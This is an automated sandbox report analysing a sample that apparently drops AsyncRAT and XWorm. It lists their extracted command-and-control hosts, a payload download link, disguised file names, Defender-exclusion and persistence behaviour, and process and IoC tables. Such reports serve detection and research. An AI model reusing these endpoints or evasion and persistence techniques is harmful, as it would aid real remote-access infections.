Analysis
-
max time kernel
63s -
max time network
64s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-10-2024 06:34
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
Default
restaurant-montreal.gl.at.ply.gg:38813
-
delay
1
-
install
true
-
install_file
bloxstrap.exe
-
install_folder
%Temp%
Extracted
xworm
methods-availability.gl.at.ply.gg:20557
-
Install_directory
%AppData%
-
install_file
Windows Updater.exe
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\discord.exe family_xworm behavioral1/memory/6128-179-0x00000000004E0000-0x00000000004F8000-memory.dmp family_xworm -
Xworm family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Windows\System32\roblox.exe family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5840 powershell.exe 5912 powershell.exe 6016 powershell.exe 5908 powershell.exe 4332 powershell.exe 6384 powershell.exe 1620 powershell.exe 6952 powershell.exe 5844 powershell.exe 4076 powershell.exe 6468 powershell.exe 6996 powershell.exe 6556 powershell.exe 5432 powershell.exe 5568 powershell.exe 5924 powershell.exe 6092 powershell.exe 6112 powershell.exe 6704 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Wave2.9a.exeWave2.9a.exediscord.exeroblox.exeroblox.exeWave2.9a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Wave2.9a.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Wave2.9a.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation discord.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation roblox.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation roblox.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Wave2.9a.exe -
Drops startup file 2 IoCs
Processes:
discord.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Updater.lnk discord.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Updater.lnk discord.exe -
Executes dropped EXE 17 IoCs
Processes:
Wave2.9a.exeWave2.9a.exeroblox.exediscord.exeBuilt.exeBuilt.exeroblox.exediscord.exeBuilt.exeBuilt.exebloxstrap.exeWindows Updater.exeWave2.9a.exeroblox.exediscord.exeBuilt.exeBuilt.exepid process 5320 Wave2.9a.exe 5724 Wave2.9a.exe 5820 roblox.exe 6128 discord.exe 5296 Built.exe 5776 Built.exe 3944 roblox.exe 6372 discord.exe 6716 Built.exe 6976 Built.exe 5452 bloxstrap.exe 5264 Windows Updater.exe 4604 Wave2.9a.exe 6088 roblox.exe 5296 discord.exe 5808 Built.exe 1388 Built.exe -
Loads dropped DLL 52 IoCs
Processes:
Built.exeBuilt.exeBuilt.exepid process 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 5776 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 6976 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe 1388 Built.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
discord.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Updater.exe" discord.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 49 ip-api.com -
Drops file in System32 directory 18 IoCs
Processes:
Wave2.9a.exeWave2.9a.exeWave2.9a.exedescription ioc process File created C:\Windows\System32\discord.exe Wave2.9a.exe File opened for modification C:\Windows\System32\roblox.exe Wave2.9a.exe File created C:\Windows\System32\discord.exe Wave2.9a.exe File created C:\Windows\System32\roblox.exe Wave2.9a.exe File opened for modification C:\Windows\System32\roblox.exe Wave2.9a.exe File opened for modification C:\Windows\System32\roblox.exe Wave2.9a.exe File created C:\Windows\System32\Built.exe Wave2.9a.exe File opened for modification C:\Windows\System32\Built.exe Wave2.9a.exe File created C:\Windows\System32\discord.exe Wave2.9a.exe File created C:\Windows\System32\roblox.exe Wave2.9a.exe File opened for modification C:\Windows\System32\discord.exe Wave2.9a.exe File created C:\Windows\System32\Built.exe Wave2.9a.exe File created C:\Windows\System32\roblox.exe Wave2.9a.exe File created C:\Windows\System32\Built.exe Wave2.9a.exe File opened for modification C:\Windows\System32\Built.exe Wave2.9a.exe File opened for modification C:\Windows\System32\discord.exe Wave2.9a.exe File opened for modification C:\Windows\System32\Built.exe Wave2.9a.exe File opened for modification C:\Windows\System32\discord.exe Wave2.9a.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 5804 tasklist.exe 6348 tasklist.exe 6684 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI52962\python310.dll upx behavioral1/memory/5776-273-0x00007FFB55910000-0x00007FFB55D7E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI52962\libffi-7.dll upx behavioral1/memory/5776-305-0x00007FFB6C360000-0x00007FFB6C36F000-memory.dmp upx behavioral1/memory/5776-278-0x00007FFB6BEB0000-0x00007FFB6BED4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI52962\_ctypes.pyd upx behavioral1/memory/5776-311-0x00007FFB5CB60000-0x00007FFB5CB79000-memory.dmp upx behavioral1/memory/5776-313-0x00007FFB54F00000-0x00007FFB55071000-memory.dmp upx behavioral1/memory/5776-312-0x00007FFB5AE40000-0x00007FFB5AE5F000-memory.dmp upx behavioral1/memory/5776-310-0x00007FFB5A2E0000-0x00007FFB5A30D000-memory.dmp upx behavioral1/memory/5776-325-0x00007FFB6B360000-0x00007FFB6B36D000-memory.dmp upx behavioral1/memory/5776-326-0x00007FFB54900000-0x00007FFB549B8000-memory.dmp upx behavioral1/memory/5776-327-0x00007FFB55910000-0x00007FFB55D7E000-memory.dmp upx behavioral1/memory/5776-328-0x00007FFB507D0000-0x00007FFB50B45000-memory.dmp upx behavioral1/memory/5776-330-0x00007FFB6BEB0000-0x00007FFB6BED4000-memory.dmp upx behavioral1/memory/5776-324-0x00007FFB558C0000-0x00007FFB558EE000-memory.dmp upx behavioral1/memory/5776-323-0x00007FFB558F0000-0x00007FFB55909000-memory.dmp upx behavioral1/memory/5776-341-0x00007FFB550E0000-0x00007FFB550F4000-memory.dmp upx behavioral1/memory/5776-343-0x00007FFB6B260000-0x00007FFB6B26D000-memory.dmp upx behavioral1/memory/5776-344-0x00007FFB53900000-0x00007FFB53A18000-memory.dmp upx behavioral1/memory/5776-342-0x00007FFB5CB60000-0x00007FFB5CB79000-memory.dmp upx behavioral1/memory/5776-350-0x00007FFB54F00000-0x00007FFB55071000-memory.dmp upx behavioral1/memory/5776-349-0x00007FFB5AE40000-0x00007FFB5AE5F000-memory.dmp upx behavioral1/memory/5776-403-0x00007FFB558F0000-0x00007FFB55909000-memory.dmp upx behavioral1/memory/5776-402-0x00007FFB558C0000-0x00007FFB558EE000-memory.dmp upx behavioral1/memory/5776-401-0x00007FFB6B360000-0x00007FFB6B36D000-memory.dmp upx behavioral1/memory/5776-400-0x00007FFB54F00000-0x00007FFB55071000-memory.dmp upx behavioral1/memory/5776-399-0x00007FFB5AE40000-0x00007FFB5AE5F000-memory.dmp upx behavioral1/memory/5776-398-0x00007FFB5CB60000-0x00007FFB5CB79000-memory.dmp upx behavioral1/memory/5776-397-0x00007FFB5A2E0000-0x00007FFB5A30D000-memory.dmp upx behavioral1/memory/5776-396-0x00007FFB6C360000-0x00007FFB6C36F000-memory.dmp upx behavioral1/memory/5776-395-0x00007FFB6BEB0000-0x00007FFB6BED4000-memory.dmp upx behavioral1/memory/5776-394-0x00007FFB55910000-0x00007FFB55D7E000-memory.dmp upx behavioral1/memory/5776-390-0x00007FFB507D0000-0x00007FFB50B45000-memory.dmp upx behavioral1/memory/5776-393-0x00007FFB53900000-0x00007FFB53A18000-memory.dmp upx behavioral1/memory/5776-392-0x00007FFB6B260000-0x00007FFB6B26D000-memory.dmp upx behavioral1/memory/5776-391-0x00007FFB550E0000-0x00007FFB550F4000-memory.dmp upx behavioral1/memory/5776-389-0x00007FFB54900000-0x00007FFB549B8000-memory.dmp upx behavioral1/memory/6976-489-0x00007FFB6C360000-0x00007FFB6C36F000-memory.dmp upx behavioral1/memory/6976-488-0x00007FFB5CB70000-0x00007FFB5CB94000-memory.dmp upx behavioral1/memory/6976-505-0x00007FFB54D60000-0x00007FFB54D7F000-memory.dmp upx behavioral1/memory/6976-504-0x00007FFB54D80000-0x00007FFB54D99000-memory.dmp upx behavioral1/memory/6976-503-0x00007FFB550D0000-0x00007FFB550FD000-memory.dmp upx behavioral1/memory/6976-509-0x00007FFB538A0000-0x00007FFB53A11000-memory.dmp upx behavioral1/memory/6976-511-0x00007FFB6B260000-0x00007FFB6B26D000-memory.dmp upx behavioral1/memory/6976-510-0x00007FFB54D40000-0x00007FFB54D59000-memory.dmp upx behavioral1/memory/6976-516-0x00007FFB507D0000-0x00007FFB50B45000-memory.dmp upx behavioral1/memory/6976-514-0x00007FFB54190000-0x00007FFB54248000-memory.dmp upx behavioral1/memory/6976-513-0x00007FFB546B0000-0x00007FFB546DE000-memory.dmp upx behavioral1/memory/6976-512-0x00007FFB55910000-0x00007FFB55D7E000-memory.dmp upx behavioral1/memory/6976-517-0x00007FFB5CB70000-0x00007FFB5CB94000-memory.dmp upx behavioral1/memory/6976-519-0x00007FFB6B360000-0x00007FFB6B36D000-memory.dmp upx behavioral1/memory/6976-518-0x00007FFB6BEA0000-0x00007FFB6BEB4000-memory.dmp upx behavioral1/memory/6976-529-0x00007FFB542A0000-0x00007FFB543B8000-memory.dmp upx behavioral1/memory/6976-556-0x00007FFB54D60000-0x00007FFB54D7F000-memory.dmp upx behavioral1/memory/6976-570-0x00007FFB6B360000-0x00007FFB6B36D000-memory.dmp upx behavioral1/memory/6976-569-0x00007FFB6BEA0000-0x00007FFB6BEB4000-memory.dmp upx behavioral1/memory/6976-557-0x00007FFB55910000-0x00007FFB55D7E000-memory.dmp upx behavioral1/memory/6976-571-0x00007FFB542A0000-0x00007FFB543B8000-memory.dmp upx behavioral1/memory/6976-582-0x00007FFB54190000-0x00007FFB54248000-memory.dmp upx behavioral1/memory/6976-581-0x00007FFB546B0000-0x00007FFB546DE000-memory.dmp upx behavioral1/memory/6976-580-0x00007FFB6B260000-0x00007FFB6B26D000-memory.dmp upx behavioral1/memory/6976-579-0x00007FFB54D40000-0x00007FFB54D59000-memory.dmp upx behavioral1/memory/6976-578-0x00007FFB538A0000-0x00007FFB53A11000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6156 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 786274.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5444 schtasks.exe 6724 schtasks.exe 6828 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exeroblox.exepowershell.exepowershell.exepid process 5096 msedge.exe 5096 msedge.exe 4084 msedge.exe 4084 msedge.exe 4240 identity_helper.exe 4240 identity_helper.exe 5212 msedge.exe 5212 msedge.exe 5568 powershell.exe 5568 powershell.exe 5568 powershell.exe 5844 powershell.exe 5844 powershell.exe 5844 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5924 powershell.exe 5924 powershell.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5924 powershell.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 4332 powershell.exe 4332 powershell.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe 4332 powershell.exe 5820 roblox.exe 5820 roblox.exe 5820 roblox.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exepid process 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exediscord.exepowershell.exeroblox.exepowershell.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exeroblox.exediscord.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exeWMIC.exedescription pid process Token: SeDebugPrivilege 5568 powershell.exe Token: SeDebugPrivilege 5844 powershell.exe Token: SeDebugPrivilege 6128 discord.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 5820 roblox.exe Token: SeDebugPrivilege 5924 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeIncreaseQuotaPrivilege 6140 WMIC.exe Token: SeSecurityPrivilege 6140 WMIC.exe Token: SeTakeOwnershipPrivilege 6140 WMIC.exe Token: SeLoadDriverPrivilege 6140 WMIC.exe Token: SeSystemProfilePrivilege 6140 WMIC.exe Token: SeSystemtimePrivilege 6140 WMIC.exe Token: SeProfSingleProcessPrivilege 6140 WMIC.exe Token: SeIncBasePriorityPrivilege 6140 WMIC.exe Token: SeCreatePagefilePrivilege 6140 WMIC.exe Token: SeBackupPrivilege 6140 WMIC.exe Token: SeRestorePrivilege 6140 WMIC.exe Token: SeShutdownPrivilege 6140 WMIC.exe Token: SeDebugPrivilege 6140 WMIC.exe Token: SeSystemEnvironmentPrivilege 6140 WMIC.exe Token: SeRemoteShutdownPrivilege 6140 WMIC.exe Token: SeUndockPrivilege 6140 WMIC.exe Token: SeManageVolumePrivilege 6140 WMIC.exe Token: 33 6140 WMIC.exe Token: 34 6140 WMIC.exe Token: 35 6140 WMIC.exe Token: 36 6140 WMIC.exe Token: SeDebugPrivilege 5804 tasklist.exe Token: SeDebugPrivilege 6092 powershell.exe Token: SeDebugPrivilege 6016 powershell.exe Token: SeIncreaseQuotaPrivilege 6140 WMIC.exe Token: SeSecurityPrivilege 6140 WMIC.exe Token: SeTakeOwnershipPrivilege 6140 WMIC.exe Token: SeLoadDriverPrivilege 6140 WMIC.exe Token: SeSystemProfilePrivilege 6140 WMIC.exe Token: SeSystemtimePrivilege 6140 WMIC.exe Token: SeProfSingleProcessPrivilege 6140 WMIC.exe Token: SeIncBasePriorityPrivilege 6140 WMIC.exe Token: SeCreatePagefilePrivilege 6140 WMIC.exe Token: SeBackupPrivilege 6140 WMIC.exe Token: SeRestorePrivilege 6140 WMIC.exe Token: SeShutdownPrivilege 6140 WMIC.exe Token: SeDebugPrivilege 6140 WMIC.exe Token: SeSystemEnvironmentPrivilege 6140 WMIC.exe Token: SeRemoteShutdownPrivilege 6140 WMIC.exe Token: SeUndockPrivilege 6140 WMIC.exe Token: SeManageVolumePrivilege 6140 WMIC.exe Token: 33 6140 WMIC.exe Token: 34 6140 WMIC.exe Token: 35 6140 WMIC.exe Token: 36 6140 WMIC.exe Token: SeDebugPrivilege 5908 powershell.exe Token: SeDebugPrivilege 3944 roblox.exe Token: SeDebugPrivilege 6372 discord.exe Token: SeDebugPrivilege 6384 powershell.exe Token: SeDebugPrivilege 6468 powershell.exe Token: SeDebugPrivilege 6996 powershell.exe Token: SeDebugPrivilege 5840 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 6348 tasklist.exe Token: SeIncreaseQuotaPrivilege 6080 WMIC.exe Token: SeSecurityPrivilege 6080 WMIC.exe Token: SeTakeOwnershipPrivilege 6080 WMIC.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
Processes:
msedge.exepid process 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
msedge.exepid process 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe 4084 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
discord.exepid process 6128 discord.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4084 wrote to memory of 4072 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4072 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 4476 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 5096 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 5096 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe PID 4084 wrote to memory of 1392 4084 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/CRTIO11⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb6b9246f8,0x7ffb6b924708,0x7ffb6b9247182⤵PID:4072
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:22⤵PID:4476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5096 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:82⤵PID:1392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:2800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:4464
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:3604
-
